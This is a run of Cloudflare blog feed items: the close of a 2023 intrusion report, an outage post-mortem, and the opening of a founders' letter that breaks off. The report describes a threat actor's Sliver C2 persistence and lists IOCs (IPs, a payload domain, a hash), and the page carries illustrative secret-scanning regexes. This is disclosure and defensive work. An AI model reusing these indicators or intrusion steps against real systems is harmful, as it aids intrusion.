      <a href="#november-22-14-18-22-threat-actor-gains-persistence">
        
      </a>
    </div>
    <p>Since the Smartsheet service account had administrative access to Atlassian Jira, the threat actor was able to install the Sliver Adversary Emulation Framework, a widely used tool and framework that red teams and attackers use to enable “C2” (command and control) connectivity, gaining persistent and stealthy access to a computer on which it is installed. Sliver was installed using the ScriptRunner for Jira plugin.</p><p>This allowed them continuous access to the Atlassian server, and they used this to attempt lateral movement. With this access the threat actor attempted to gain access to a non-production console server in our São Paulo, Brazil data center due to a non-enforced ACL. The access was denied, and they were not able to access any of the global network.</p><p>Over the next day, the threat actor viewed 120 code repositories (out of a total of 11,904 repositories). Of the 120, the threat actor used the Atlassian Bitbucket git archive feature on 76 repositories to download them to the Atlassian server, and even though we were not able to confirm whether or not they had been exfiltrated, we decided to treat them as having been exfiltrated.</p><p>The 76 source code repositories were almost all related to how backups work, how the global network is configured and managed, how identity works at Cloudflare, remote access, and our use of Terraform and Kubernetes. A small number of the repositories contained encrypted secrets, which were rotated immediately even though they were themselves strongly encrypted.</p><p>We focused particularly on these 76 source code repositories to look for embedded secrets (secrets stored in the code were rotated), vulnerabilities, and ways in which an attacker could use them to mount a subsequent attack. 
This work was done as a priority by engineering teams across the company as part of “Code Red”.</p><p>As a SaaS company, we’ve long believed that our source code itself is not as precious as the source code of software companies that distribute software to end users. In fact, we’ve open sourced a large amount of our source code and speak openly through our blog about algorithms and techniques we use. So our focus was not on someone having access to the source code, but whether that source code contained embedded secrets (such as a key or token) and vulnerabilities.</p>
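<p>The search for embedded secrets described above is, at its core, pattern-matching file contents against known credential formats. A minimal sketch (the patterns and sample text are illustrative only; production scanners use far larger rule sets plus entropy checks):</p>

```python
import re

# Illustrative credential patterns; real scanners carry hundreds of rules.
SECRET_PATTERNS = {
    "aws_access_key": re.compile(r"AKIA[0-9A-Z]{16}"),
    "generic_api_key": re.compile(r"(?i)(api[_-]?key|token)\s*[:=]\s*['\"][A-Za-z0-9_\-]{20,}['\"]"),
    "private_key": re.compile(r"-----BEGIN (?:RSA |EC )?PRIVATE KEY-----"),
}


def scan_text(text):
    """Return the names of secret patterns found in a blob of text."""
    return [name for name, pattern in SECRET_PATTERNS.items() if pattern.search(text)]


# Hypothetical repository snippet containing a hard-coded token.
sample = 'db_token = "abcd1234efgh5678ijkl9012"\nuser = "deploy"'
print(scan_text(sample))  # flags the generic_api_key pattern
```

<p>Any hit from a scan like this is treated as compromised and rotated, which mirrors the “assume the worst” posture described earlier.</p>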
    <div>
      <h3>November 23 - Discovery and threat actor access termination begins</h3>
      <a href="#november-23-discovery-and-threat-actor-access-termination-begins">
        
      </a>
    </div>
    <p>Our security team was alerted to the threat actor’s presence at 16:00 and deactivated the Smartsheet service account 35 minutes later. 48 minutes later the user account created by the threat actor was found and deactivated. Here’s the detailed timeline for the major actions taken to block the threat actor once the first alert was raised.</p><ul><li>15:58 - The threat actor adds the Smartsheet service account to an administrator group.</li><li>16:00 - Automated alert about the change at 15:58 to our security team.</li><li>16:12 - Cloudflare SOC starts investigating the alert.</li><li>16:35 - Smartsheet service account deactivated by Cloudflare SOC.</li><li>17:23 - The threat actor-created Atlassian user account is found and deactivated.</li><li>17:43 - Internal Cloudflare incident declared.</li><li>21:31 - Firewall rules put in place to block the threat actor’s known IP addresses.</li></ul>
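<p>Conceptually, the automated alert that caught the intrusion is a rule over audit-log events: any change that grants an account membership in an administrator group pages the SOC. A hedged sketch (the event shape, field names, and group names are hypothetical, not the actual alerting pipeline):</p>

```python
SENSITIVE_GROUPS = {"administrators", "site-admins"}  # hypothetical group names


def should_alert(event):
    """Flag audit events that grant membership in a sensitive group."""
    return (
        event.get("action") == "group_membership_added"
        and event.get("group", "").lower() in SENSITIVE_GROUPS
    )


# Hypothetical audit event resembling the 15:58 change described above.
event = {
    "action": "group_membership_added",
    "actor": "smartsheet-svc",   # service account performing the change
    "target": "smartsheet-svc",
    "group": "administrators",
    "timestamp": "2023-11-23T15:58:00Z",
}
print(should_alert(event))  # True: page the SOC
```

<p>The value of a rule this simple is its low latency: here the alert fired two minutes after the change and the SOC began investigating twelve minutes later.</p>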
    <div>
      <h3>November 24 - Sliver removed; all threat actor access terminated</h3>
      <a href="#november-24-sliver-removed-all-threat-actor-access-terminated">
        
      </a>
    </div>
    <ul><li>10:44 - Last known threat actor activity.</li><li>11:59 - Sliver removed.</li></ul><p>Throughout this timeline, the threat actor tried to access a myriad of other systems at Cloudflare but failed because of our access controls, firewall rules, and use of hard security keys enforced using our own Zero Trust tools.</p><p>To be clear, we saw no evidence whatsoever that the threat actor got access to our global network, data centers, SSL keys, customer databases or configuration information, Cloudflare Workers deployed by us or customers, AI models, network infrastructure, or any of our datastores like Workers KV, R2 or Quicksilver. Their access was limited to the Atlassian suite and the server on which our Atlassian runs.</p><p>A large part of our “Code Red” effort was understanding what the threat actor got access to and what they tried to access. By looking at logging across systems we were able to track attempted access to our internal metrics, network configuration, build system, alerting systems, and release management system. Based on our review, none of their attempts to access these systems were successful. Independently, CrowdStrike performed an assessment of the scope and extent of the threat actor’s activity, which did not bring to light activities that we had missed and concluded that the last evidence of threat activity was on November 24 at 10:44.</p><p>We are confident that between our investigation and CrowdStrike’s, we fully understand the threat actor’s actions and that they were limited to the systems on which we saw their activity.</p>
    <div>
      <h3>Conclusion</h3>
      <a href="#conclusion">
        
      </a>
    </div>
    <p>This was a security incident involving a sophisticated actor, likely a nation-state, who operated in a thoughtful and methodical manner. The efforts we have taken ensure that the ongoing impact of the incident was limited and that we are well-prepared to fend off any sophisticated attacks in the future. This required the efforts of a significant number of Cloudflare’s engineering staff, and, for over a month, this was the highest priority at Cloudflare. The entire Cloudflare team worked to ensure that our systems were secure, to understand the threat actor’s access, to remediate immediate priorities (such as mass credential rotation), and to build a plan of long-running work to improve our overall security based on areas for improvement discovered during this process.</p><p>We are incredibly grateful to everyone at Cloudflare who responded quickly over the Thanksgiving holiday to conduct an initial analysis and lock out the threat actor, and all those who contributed to this effort. It would be impossible to name everyone involved, but their long hours and dedicated work made it possible to undertake an essential review and change of Cloudflare’s security while keeping our global network running and our customers’ service running.</p><p>We are grateful to CrowdStrike for having been available immediately to conduct an independent assessment. Now that their final report is complete, we are confident in our internal analysis and remediation of the intrusion and are making this blog post available.</p><p><b>IOCs</b></p><p>Below are the Indicators of Compromise (IOCs) that we saw from this threat actor. We are publishing them so that other organizations, and especially those that may have been impacted by the Okta breach, can search their logs to confirm the same threat actor did not access their systems.</p>
<table>
<thead>
  <tr>
    <th><span>Indicator</span></th>
    <th><span>Indicator Type</span></th>
    <th><span>SHA256</span></th>
    <th><span>Description</span></th>
  </tr>
</thead>
<tbody>
  <tr>
    <td><span>193.142.58[.]126 </span></td>
    <td><span>IPv4</span></td>
    <td><span>N/A</span></td>
    <td><span>Primary threat actor</span><br /><span>Infrastructure, owned by</span><br /><span>M247 Europe SRL (Bucharest,</span><br /><span>Romania)</span></td>
  </tr>
  <tr>
    <td><span>198.244.174[.]214 </span></td>
    <td><span>IPv4</span></td>
    <td><span>N/A</span></td>
    <td><span>Sliver C2 server, owned by</span><br /><span>OVH SAS (London, England)</span></td>
  </tr>
  <tr>
    <td><span>idowall[.]com</span></td>
    <td><span>Domain</span></td>
    <td><span>N/A</span></td>
    <td><span>Infrastructure serving Sliver</span><br /><span>payload</span></td>
  </tr>
  <tr>
    <td><span>jvm-agent</span></td>
    <td><span>Filename</span></td>
    <td><span>bdd1a085d651082ad567b03e5186d1d4<br />6d822bb7794157ab8cce95d850a3caaf</span></td>
    <td><span>Sliver payload</span></td>
  </tr>
</tbody>
</table><p></p> ]]></content:encoded>
            <category><![CDATA[Security]]></category>
            <guid isPermaLink="false">4iLxjDabtXj9DBA7dv3Wig</guid>
            <dc:creator>Matthew Prince</dc:creator>
            <dc:creator>John Graham-Cumming</dc:creator>
            <dc:creator>Grant Bourzikas</dc:creator>
        </item>
        <item>
            <title><![CDATA[Post mortem on the Cloudflare Control Plane and Analytics Outage]]></title>
            <link>https://blog.cloudflare.com/post-mortem-on-cloudflare-control-plane-and-analytics-outage/</link>
            <pubDate>Sat, 04 Nov 2023 06:18:55 GMT</pubDate>
            <description><![CDATA[ Beginning on Thursday, November 2, 2023, at 11:43 UTC Cloudflare's control plane and analytics services experienced an outage. Here are the details ]]></description>
            <content:encoded><![CDATA[ <p></p><p>Beginning on Thursday, November 2, 2023, at 11:43 UTC Cloudflare's control plane and analytics services experienced an outage. The control plane of Cloudflare consists primarily of the customer-facing interface for all of our services including our website and APIs. Our analytics services include logging and analytics reporting.</p><p>The incident lasted from November 2 at 11:44 UTC until November 4 at 04:25 UTC. We were able to restore most of our control plane at our disaster recovery facility as of November 2 at 17:57 UTC. Many customers would not have experienced issues with most of our products after the disaster recovery facility came online. However, other services took longer to restore and customers that used them may have seen issues until we fully resolved the incident. Our raw log services were unavailable for most customers for the duration of the incident.</p><p>Services have now been restored for all customers. Throughout the incident, Cloudflare's network and security services continued to work as expected. While there were periods where customers were unable to make changes to those services, traffic through our network was not impacted.</p><p>This post outlines the events that caused this incident, the architecture we had in place to prevent issues like this, what failed, what worked and why, and the changes we're making based on what we've learned over the last 36 hours.</p><p>To start, this never should have happened. We believed that we had high availability systems in place that should have stopped an outage like this, even when one of our core data center providers failed catastrophically. And, while many systems did remain online as designed, some critical systems had non-obvious dependencies that made them unavailable. I am sorry and embarrassed for this incident and the pain that it caused our customers and our team.</p>
    <div>
      <h3>Intended Design</h3>
      <a href="#intended-design">
        
      </a>
    </div>
    <p>Cloudflare's control plane and analytics systems run primarily on servers in three data centers around Hillsboro, Oregon. The three data centers are independent of one another, each have multiple utility power feeds, and each have multiple redundant and independent network connections.</p><p>The facilities were intentionally chosen to be at a distance apart that would minimize the chances that a natural disaster would cause all three to be impacted, while still close enough that they could all run active-active redundant data clusters. This means that they are continuously syncing data between the three facilities. By design, if any of the facilities goes offline then the remaining ones are able to continue to operate.</p><p>This is a system design that we began implementing four years ago. While most of our critical control plane systems had been migrated to the high availability cluster, some services, especially for some newer products, had not yet been added to the high availability cluster.</p><p>In addition, our logging systems were intentionally not part of the high availability cluster. The logic of that decision was that logging was already a distributed problem where logs were queued at the edge of our network and then sent back to the core in Oregon (or another regional facility for customers using regional services for logging). If our logging facility was offline then analytics logs would queue at the edge of our network until it came back online. We determined that analytics being delayed was acceptable.</p>
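<p>The queue-at-the-edge design for logs can be sketched as a buffer that holds entries while the core facility is unreachable and drains them, in order, once it comes back. A minimal illustration (the class and its interface are hypothetical, not the actual log pipeline):</p>

```python
from collections import deque


class EdgeLogBuffer:
    """Queue log entries at the edge; flush them to the core when reachable."""

    def __init__(self):
        self.queue = deque()     # entries awaiting delivery
        self.delivered = []      # entries the core has received, in order

    def log(self, entry, core_online):
        self.queue.append(entry)
        if core_online:
            self.flush()

    def flush(self):
        while self.queue:
            self.delivered.append(self.queue.popleft())


buf = EdgeLogBuffer()
buf.log("req-1", core_online=True)    # delivered immediately
buf.log("req-2", core_online=False)   # core facility offline: queued at the edge
buf.log("req-3", core_online=False)
buf.log("req-4", core_online=True)    # core back: backlog drains in order
print(buf.delivered)  # all four entries, in original order
```

<p>This is why a core logging outage shows up as delayed analytics rather than lost logs, which is the trade-off the design accepts.</p>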
    <div>
      <h3>Flexential Data Center Power Failure</h3>
      <a href="#flexential-data-center-power-failure">
        
      </a>
    </div>
    <p>The largest of the three facilities in Oregon is run by Flexential. We refer to this facility as “PDX-04”. Cloudflare leases space in PDX-04, where we house our largest analytics cluster as well as more than a third of the machines for our high availability cluster. It is also the default location for services that have not yet been onboarded onto our high availability cluster. We are a relatively large customer of the facility, consuming approximately 10 percent of its total capacity.</p><p>On November 2 at 08:50 UTC, Portland General Electric (PGE), the utility company that services PDX-04, had an unplanned maintenance event affecting one of their independent power feeds into the building. That event shut down one feed into PDX-04. The data center has multiple feeds with some level of independence that can power the facility. However, Flexential powered up their generators to effectively supplement the feed that was down.</p><p>Counter to best practices, Flexential did not inform Cloudflare that they had failed over to generator power. None of our <a href="https://www.cloudflare.com/learning/performance/what-is-observability/">observability tools</a> were able to detect that the source of power had changed. Had they informed us, we would have stood up a team to monitor the facility closely and move control plane services that were dependent on that facility out while it was degraded.</p><p>It is also unusual that Flexential ran both the one remaining utility feed and the generators at the same time. It is not unusual for utilities to ask data centers to drop off the grid when power demands are high and run exclusively on generators. Flexential operates 10 generators, inclusive of redundant units, capable of supporting the facility at full load. It would also have been possible for Flexential to run the facility only from the remaining utility feed. We haven’t gotten a clear answer as to why they ran both utility power and generator power.</p>
    <div>
      <h3>Informed Speculation On What Happened Next</h3>
      <a href="#informed-speculation-on-what-happened-next">
        
      </a>
    </div>
    <p>From this decision onward, we don't yet have clarity from Flexential on the root cause or some of the decisions they made or the events that followed. We will update this post as we get more information from Flexential, as well as PGE, on what happened. Some of what follows is informed speculation based on the most likely series of events as well as what individual Flexential employees have shared with us unofficially.</p><p>One possible reason they may have left the utility line running is that Flexential was part of a program with PGE called DSG. DSG allows the local utility to run a data center's generators to help supply additional power to the grid. In exchange, the power company helps maintain the generators and supplies fuel. We have been unable to locate any record of Flexential informing us about the DSG program. We've asked if DSG was active at the time and have not received an answer. We do not know if it contributed to the decisions that Flexential made, but it could explain why the utility line remained online after the generators were started.</p><p>At approximately 11:40 UTC, there was a ground fault on a PGE transformer at PDX-04. We believe, but have not been able to get confirmation from Flexential or PGE, that this was the transformer that stepped down power from the grid for the second feed that was still running as it entered the data center. It seems likely, though we have not been able to confirm with Flexential or PGE, that the ground fault was caused by the unplanned maintenance PGE was performing that impacted the first feed. Or it was a very unlucky coincidence.</p><p>Ground faults with high voltage (12,470 volt) power lines are very bad. Electrical systems are designed to quickly shut down to prevent damage when one occurs. Unfortunately, in this case, the protective measure also shut down all of PDX-04’s generators. 
This meant that the two sources of power generation for the facility — both the redundant utility lines as well as the 10 generators — were offline.</p><p>Fortunately, in addition to the generators, PDX-04 also contains a bank of UPS batteries. These batteries are supposedly sufficient to power the facility for approximately 10 minutes. That time is meant to be enough to bridge the gap between the power going out and the generators automatically starting up. If Flexential could get the generators or a utility feed restored within 10 minutes then there would be no interruption. In reality, the batteries started to fail after only 4 minutes based on what we observed from our own equipment failing. And it took Flexential far longer than 10 minutes to get the generators restored.</p>
    <div>
      <h3>Attempting to Restore Power</h3>
      <a href="#attempting-to-restore-power">
        
      </a>
    </div>
    <p>While we haven't gotten official confirmation, we have been told by employees that three things hampered getting the generators back online. First, they needed to be physically accessed and manually restarted because of the way the ground fault had tripped circuits. Second, Flexential's access control system was not powered by the battery backups, so it was offline. And third, the overnight staffing at the site did not include an experienced operations or electrical expert — the overnight shift consisted of security and an unaccompanied technician who had only been on the job for a week.</p><p>Between 11:44 and 12:01 UTC, with the generators not fully restarted, the UPS batteries ran out of power and all customers of the data center lost power. Throughout this, Flexential never informed Cloudflare that there was any issue at the facility. We were first notified of issues in the data center when the two routers that connect the facility to the rest of the world went offline at 11:44 UTC. When we weren't able to reach the routers directly or through out-of-band management, we attempted to contact Flexential and dispatched our local team to physically travel to the facility. The first message to us from Flexential that they were experiencing an issue was at 12:28 UTC.</p><blockquote><p><i>We are currently experiencing an issue with power at our [PDX-04] that began at approximately 0500AM PT [12:00 UTC]. Engineers are actively working to resolve the issue and restore service. We will communicate progress every 30 minutes or as more information becomes available as to the estimated time to restore. Thank you for your patience and understanding.</i></p></blockquote>
    <div>
      <h3>Designing for Data Center Level Failure</h3>
      <a href="#designing-for-data-center-level-failure">
        
      </a>
    </div>
    <p>While PDX-04’s design was certified Tier III before construction and is expected to deliver high availability SLAs, we planned for the possibility that it could go offline. Even well-run facilities can have bad days. What we expected would happen in that case is that our analytics would be offline, logs would be queued at the edge and delayed, and certain lower priority services that were not integrated into our high availability cluster would go offline temporarily until they could be restored at another facility.</p><p>The other two data centers running in the area would take over responsibility for the high availability cluster and keep critical services online. Generally that worked as planned. Unfortunately, we discovered that a subset of services that were supposed to be on the high availability cluster had dependencies on services exclusively running in PDX-04.</p><p>In particular, two critical services that process logs and power our analytics — Kafka and ClickHouse — were only available in PDX-04 but had dependent services running in the high availability cluster. Those dependencies shouldn’t have been so tight, should have failed more gracefully, and we should have caught them.</p><p>We had performed testing of our high availability cluster by taking each (and both) of the other two data center facilities entirely offline. And we had also tested taking the high availability portion of PDX-04 offline. However, we had never tested fully taking the entire PDX-04 facility offline. As a result, we had missed the importance of some of these dependencies on our data plane.</p><p>We were also far too lax about requiring new products and their associated databases to integrate with the high availability cluster. Cloudflare allows multiple teams to innovate quickly. As such, products often take different paths toward their initial alpha. 
While, over time, our practice is to migrate the backend for these services to our best practices, we did not formally require that before products were declared generally available (GA). That was a mistake as it meant that the redundancy protections we had in place worked inconsistently depending on the product.</p><p>Moreover, far too many of our services depend on the availability of our core facilities. While this is the way a lot of software services are created, it does not play to Cloudflare’s strength. We are good at distributed systems. Throughout this incident, our global network continued to perform as expected. While some of our products and features are configurable and serviceable through the edge of our network without needing the core, far too many today fail if the core is unavailable. We need to use the distributed systems products that we make available to all our customers for all our services, so they continue to function mostly as normal even if our core facilities are disrupted.</p>
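<p>Hidden dependencies like these are mechanical enough to hunt for automatically. The sketch below is purely illustrative (hypothetical service names and tiers, not Cloudflare's actual inventory): it walks each high availability service's transitive dependencies and flags any that bottom out in a single facility.</p>

```python
# Hypothetical inventory: the tier each service runs on and the services
# it calls. Names and tiers are illustrative, not Cloudflare's real stack.
SERVICES = {
    "api":        {"tier": "ha",    "deps": ["kafka", "auth"]},
    "auth":       {"tier": "ha",    "deps": []},
    "kafka":      {"tier": "pdx04", "deps": []},
    "clickhouse": {"tier": "pdx04", "deps": ["kafka"]},
}

def transitive_deps(name, services):
    """All services reachable from `name` through dependency edges."""
    seen, stack = set(), list(services[name]["deps"])
    while stack:
        dep = stack.pop()
        if dep not in seen:
            seen.add(dep)
            stack.extend(services[dep]["deps"])
    return seen

def single_site_risks(services):
    """Map each HA service to the non-HA services it transitively depends on."""
    risks = {}
    for name, info in services.items():
        if info["tier"] != "ha":
            continue
        pinned = sorted(d for d in transitive_deps(name, services)
                        if services[d]["tier"] != "ha")
        if pinned:
            risks[name] = pinned
    return risks
```

<p>Against this toy inventory, <code>single_site_risks(SERVICES)</code> returns <code>{"api": ["kafka"]}</code>: a service that looks highly available but is quietly pinned to one facility. Running a check like this continuously is one way to catch such dependencies before an outage does.</p>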
    <div>
      <h3>Disaster Recovery</h3>
      <a href="#disaster-recovery">
        
      </a>
    </div>
    <p>At 12:48 UTC, Flexential was able to get the generators restarted. Power returned to portions of the facility. In order to not overwhelm the system, when power is restored to a data center it is typically done gradually by powering back on one circuit at a time. Like the circuit breakers in a residential home, each customer is serviced by redundant breakers. When Flexential attempted to power back up Cloudflare's circuits, the circuit breakers were discovered to be faulty. We don't know if the breakers failed due to the ground fault or some other surge as a result of the incident, or if they'd been bad before and it was only discovered after they had been powered off.</p><p>Flexential began the process of replacing the failed breakers. That required them to source new breakers because more had failed than they had spares on hand in the facility. Because more services were offline than we expected, and because Flexential could not give us a time for restoration of our services, we made the call at 13:40 UTC to fail over to Cloudflare's disaster recovery sites located in Europe. Thankfully, we only needed to fail over a small percentage of Cloudflare’s overall control plane. Most of our services continued to run on our high availability systems across the two active core data centers.</p><p>We turned up the first services on the disaster recovery site at 13:43 UTC. Cloudflare's disaster recovery sites provide critical control plane services in the event of a disaster. While the disaster recovery site does not support some of our log processing services, it is designed to support the other portions of our control plane.</p><p>When services were turned up there, we experienced a thundering herd problem where the API calls that had been failing overwhelmed our services. We implemented rate limits to get the request volume under control. 
During this period, customers of most products would have seen intermittent errors when making modifications through our dashboard or API. By 17:57 UTC, the services that had been successfully moved to the disaster recovery site were stable and most customers were no longer directly impacted. However, some systems still required manual configuration (e.g., Magic WAN) and some other services, largely related to log processing and some bespoke APIs, remained unavailable until we were able to restore PDX-04.</p>
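<p>Admission control of this kind is commonly built on a token bucket: each request spends a token, tokens refill at a fixed rate, and anything beyond that rate is rejected rather than allowed to overwhelm a recovering backend. A minimal single-process sketch, purely illustrative (Cloudflare's production rate limiting is distributed and far more sophisticated):</p>

```python
import time

class TokenBucket:
    """Minimal token-bucket rate limiter (illustrative sketch only)."""

    def __init__(self, rate: float, capacity: int):
        self.rate = rate              # tokens refilled per second
        self.capacity = capacity      # maximum burst size
        self.tokens = float(capacity)
        self.last = time.monotonic()

    def allow(self) -> bool:
        """Admit one request if a token is available."""
        now = time.monotonic()
        # Refill in proportion to elapsed time, capped at capacity.
        self.tokens = min(self.capacity,
                          self.tokens + (now - self.last) * self.rate)
        self.last = now
        if self.tokens >= 1.0:
            self.tokens -= 1.0
            return True
        return False
```

<p>With <code>rate=1, capacity=3</code>, three back-to-back requests are admitted and subsequent ones are rejected until tokens refill — the behavior that lets a thundering herd drain instead of compounding.</p>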
    <div>
      <h3>Some Products and Features Delayed Restart</h3>
      <a href="#some-products-and-features-delayed-restart">
        
      </a>
    </div>
    <p>A handful of products were not properly stood up on our disaster recovery sites. These tended to be newer products where we had not fully implemented and tested a disaster recovery procedure. These included our Stream service for uploading new videos and some other services. Our team worked two simultaneous tracks to get these services restored: 1) reimplementing them on our disaster recovery sites; and 2) migrating them to our high availability cluster.</p><p>Flexential replaced our failed circuit breakers, restored both utility feeds, and confirmed clean power at 22:48 UTC. Our team was all-hands-on-deck and had worked all day on the emergency, so I made the call that most of us should get some rest and start the move back to PDX-04 in the morning. That decision delayed our full recovery, but I believe made it less likely that we’d compound this situation with additional mistakes.</p><p>First thing on November 3, our team began restoring service in PDX-04. That started with physically booting our network gear, then powering up thousands of servers and restoring their services. The state of our services in the data center was unknown as we believed multiple power cycles were likely to have occurred during the incident. Our only safe process to recover was to follow a complete bootstrap of the entire facility.</p><p>This involved a manual process of bringing our configuration management servers online to begin the restoration of the facility. Rebuilding these took 3 hours. From there, our team was able to bootstrap the rebuild of the rest of the servers that power our services. Each server took between 10 minutes and 2 hours to rebuild. While we were able to run this in parallel across multiple servers, there were inherent dependencies between services that required some to be brought back online in sequence.</p><p>Services were fully restored as of November 4, 2023, at 04:25 UTC. 
Because we also store analytics in our European core data centers, most customers should see no data loss across our dashboard and APIs. However, some datasets that are not replicated in the EU will have persistent gaps. For customers that use our log push feature, logs will not have been processed for the majority of the event, so anything you did not receive will not be recovered.</p>
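<p>The dependency-ordered restart described above maps naturally onto a topological sort: at each step, every service whose dependencies are already up forms a batch that can be rebuilt in parallel, while the batches themselves run in sequence. A minimal sketch using Python's standard-library graphlib, with hypothetical service names rather than our actual bootstrap order:</p>

```python
from graphlib import TopologicalSorter

# Hypothetical graph: each service maps to the services it must wait for.
DEPS = {
    "config-mgmt": set(),
    "database":    {"config-mgmt"},
    "kafka":       {"config-mgmt"},
    "api":         {"database", "kafka"},
    "dashboard":   {"api"},
}

def restart_batches(deps):
    """Group services into batches; each batch can be restored in parallel."""
    ts = TopologicalSorter(deps)
    ts.prepare()
    batches = []
    while ts.is_active():
        ready = sorted(ts.get_ready())  # all dependencies of these are done
        batches.append(ready)
        ts.done(*ready)
    return batches
```

<p>For the graph above, <code>restart_batches(DEPS)</code> yields <code>[["config-mgmt"], ["database", "kafka"], ["api"], ["dashboard"]]</code>, which makes both the parallelizable work and the sequential bottlenecks explicit.</p>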
    <div>
      <h3>Lessons and Remediation</h3>
      <a href="#lessons-and-remediation">
        
      </a>
    </div>
    <p>We have a number of questions that we need Flexential to answer. But we also must expect that entire data centers may fail. Google has a process whereby, when there’s a significant event or crisis, they can call a Code Yellow or Code Red. In these cases, most or all engineering resources are shifted to addressing the issue at hand.</p><p>We have not had such a process in the past, but it’s clear today we need to implement a version of it ourselves: Code Orange. We are shifting all non-critical engineering functions to focus on ensuring high reliability of our control plane. As part of that, we expect the following changes:</p><ul><li><p>Remove dependencies on our core data centers for control plane configuration of all services and move them wherever possible to be powered first by our distributed network</p></li><li><p>Ensure that the control plane running on the network continues to function even if all our core data centers are offline</p></li><li><p>Require that all products and features designated Generally Available rely on the high availability cluster (if they rely on any of our core data centers), without having any software dependencies on specific facilities</p></li><li><p>Require that all products and features designated Generally Available have a reliable disaster recovery plan that is tested</p></li><li><p>Test the blast radius of system failures and minimize the number of services that are impacted by a failure</p></li><li><p>Implement more rigorous chaos testing of all data center functions including the full removal of each of our core data center facilities</p></li><li><p>Thoroughly audit all core data centers, with a plan to reaudit to ensure they comply with our standards</p></li><li><p>Implement a logging and analytics disaster recovery plan that ensures no logs are dropped even in the case of a failure of all our core facilities</p></li></ul><p>As I said earlier, I am sorry and embarrassed for this incident and the pain that 
it caused our customers and our team. We have the right systems and procedures in place to be able to withstand even the cascading string of failures we saw at our data center provider, but we need to be more rigorous about enforcing that they are followed and tested for unknown dependencies. This will have my full attention and the attention of a large portion of our team through the balance of the year. And the pain from the last couple of days will make us better.</p> ]]></content:encoded>
            <category><![CDATA[Outage]]></category>
            <category><![CDATA[Post Mortem]]></category>
            <guid isPermaLink="false">73EdtHPXJkJx7fwtNqtJ2a</guid>
            <dc:creator>Matthew Prince</dc:creator>
        </item>
        <item>
            <title><![CDATA[Cloudflare’s 2023 Annual Founders’ Letter]]></title>
            <link>https://blog.cloudflare.com/cloudflares-annual-founders-letter-2023/</link>
            <pubDate>Wed, 27 Sep 2023 13:00:25 GMT</pubDate>
            <description><![CDATA[ Cloudflare is officially a teenager. We launched on September 27, 2010. Today we celebrate our thirteenth birthday ]]></description>
            <content:encoded><![CDATA[ <p></p>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/67OiVANFpoXiW5HSigsJXf/daf80a65e1bcb4c51943f2377bd7cff4/Founders--Letter-2.png" />
            
            </figure><p>Cloudflare is officially a teenager. We launched on September 27, 2010. Today we celebrate our thirteenth birthday. As is our tradition, we use the week of our birthday to launch products that we think of as our gift back to the Internet. More on some of the incredible announcements in a second, but we wanted to start by talking about something more fundamental: our identity.</p>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/4fdonv6sU0NR22ONAvY8Nf/3a6a1d778beedf089e3693770f4489cc/Untitled-2.png" />
            
            </figure><p>Like many kids, it took us a while to fully understand who we are. We chafed at being put in boxes. People would describe Cloudflare as a security company, and we'd say, "That's not all we do." They'd say we were a network, and we'd object that we were so much more. Worst of all, they'd sometimes call us a "CDN," and we'd remind them that caching is a part of any sensibly designed system, but it shouldn't be a feature unto itself. Thank you very much.</p><p>And so, yesterday, the day before our thirteenth birthday, we announced to the world finally what we realized we are: a connectivity cloud.</p>
    <div>
      <h3>The connectivity cloud</h3>
      <a href="#the-connectivity-cloud">
        
      </a>
    </div>
    <p>What does that mean? "Connectivity" means we measure ourselves by connecting people and things together. Our job isn't to be the final destination for your data, but to help it move and flow. Any application, any data, anyone, anywhere, anytime — that's the essence of connectivity, and that’s always been the promise of the Internet.</p><p>"Cloud" means the batteries are included. It scales with you. It’s programmable. It has consistent security built in. It’s intelligent and learns from your usage and others', and optimizes for outcomes better than you ever could on your own.</p>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/5vtrLo5x2vMruQ6lphoUTm/9545282c61e0dd10d19830401c10c481/Untitled--1--1.png" />
            
            </figure><p>Our connectivity cloud is worth contrasting against some other clouds. The so-called hyperscale public clouds are, in many ways, the opposite. They optimize for hoarding your data. Locking it in. Making it difficult to move. They are captivity clouds. And, while they may be great for some things, their full potential will only truly be unlocked for customers when combined with a connectivity cloud that lets you mix and match the best of each of their features.</p>
    <div>
      <h3>Enabling the future</h3>
      <a href="#enabling-the-future">
        
      </a>
    </div>
    <p>That's what we're seeing from the hottest startups these days. Many of the leading AI companies are using Cloudflare's connectivity cloud to move their training data to wherever there's excess GPU capacity. We estimate that across the AI startup ecosystem, Cloudflare is the most commonly used cloud provider. Because, if you're building the future, you know connectivity and the agility of the cloud are key.</p><p>We've spent the last year listening to our AI customers and trying to understand what the future of AI will look like and how we can better help them build it. Today, we're releasing a series of products and features borne of those conversations and opening incredible new opportunities.</p><p>The biggest opportunity in <a href="https://www.cloudflare.com/learning/ai/what-is-artificial-intelligence/">AI</a> is inference. Inference is what happens when you type a prompt to write a poem about your love of connectivity clouds into ChatGPT and, seconds later, get a coherent response. Or when you run a search for a picture of your passport on your phone, and it immediately pulls it up.</p>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/3hZTnf3ox43UTTLSCoQYoi/b0958157538422c72ca13764af98c06e/Untitled--2--1.png" />
            
            </figure><p>The models that power those modern miracles take significant time to generate — a process called training. Once trained though, they can have new data fed through them over and over to generate valuable new output.</p>
    <div>
      <h3>Where inference happens</h3>
      <a href="#where-inference-happens">
        
      </a>
    </div>
    <p>Before today, those models could run in two places. The first was the end user's device — like in the case of the search for “passport” in the photos on your phone. When that's possible it's great. It's fast. Your private data stays local. And it works even when there's no network access. But it's also challenging. Models are big and the storage on your phone or other local device is limited. Moreover, putting the fastest GPU resources to process these models in your phone makes the phone expensive and burns precious battery resources.</p><p>The alternative has been the centralized public cloud. This is what’s used for a big model like OpenAI’s GPT-4, which runs services like ChatGPT. But that has its own challenges. Today, nearly all the GPU resources for AI are deployed in the US — a fact that rightfully troubles the rest of the world. As AI queries get more personal, sending them all to some centralized cloud is a potential security and data locality disaster waiting to happen. Moreover, it's inherently slow and less efficient and therefore more costly than running the inference locally.</p>
    <div>
      <h3>A third place for inference</h3>
      <a href="#a-third-place-for-inference">
        
      </a>
    </div>
